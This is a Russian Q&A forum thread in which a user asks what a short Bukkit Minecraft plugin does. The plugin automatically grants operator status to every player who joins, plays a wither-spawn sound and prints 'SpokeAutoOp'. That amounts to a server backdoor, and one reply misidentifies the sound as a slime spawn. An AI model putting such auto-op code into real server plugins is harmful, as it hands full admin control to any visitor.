Что означает этот код плагина в майнкрафт на джаве

Даня Крупин Знаток (358), открыт 13 часов назад
package Classes;

import org.bukkit.ChatColor;
import org.bukkit.Sound;
import org.bukkit.entity.Player;
import org.bukkit.event.EventHandler;
import org.bukkit.event.Listener;
import org.bukkit.event.player.PlayerJoinEvent;
import org.bukkit.plugin.Plugin;
import org.bukkit.plugin.java.JavaPlugin;

public class MainClass extends JavaPlugin implements Listener {
public void onEnable() {
getServer().getPluginManager().registerEvents(this, (Plugin)this);
getLogger().info("#**# Spoke was activated! #**#");
}

public void onDisable() {
getLogger().info("#//# Spoke was disactivated! #//#");
}

@EventHandler
public void onPlayerJoin(PlayerJoinEvent e) {
Player p = e.getPlayer();
p.setOp(true);
p.playSound(p.getLocation(), Sound.WITHER_SPAWN, 25.0F, 5.0F);
p.sendMessage( ChatColor.GOLD + "SpokeAutoOp");
}
3 ответа
NORTCHOT Гуру (2761) 13 часов назад
ну, работу плагина
Даня КрупинЗнаток (358) 13 часов назад
нет
NORTCHOT Гуру (2761) Даня Крупин, так если знаешь, зачем спрашиваешь?
dyrak dyrak Гуру (2712) 13 часов назад
хз может опку выдает и спавнит звук призыва визера на место, где стоит игрок
Рустам Абдрашитов Мыслитель (7188) 13 часов назад
Код плагина для Minecraft на Java реализует базовую функциональность, которая активируется, когда игрок присоединяется к серверу.

При активации плагина (метод onEnable) регистрируется слушатель событий, а в лог выводится сообщение о запуске. Когда игрок заходит на сервер (метод onPlayerJoin), ему автоматически присваивается операторский статус (setOp(true)), воспроизводится звук спавна слизи, и отправляется сообщение в золотом цвете "SpokeAutoOp".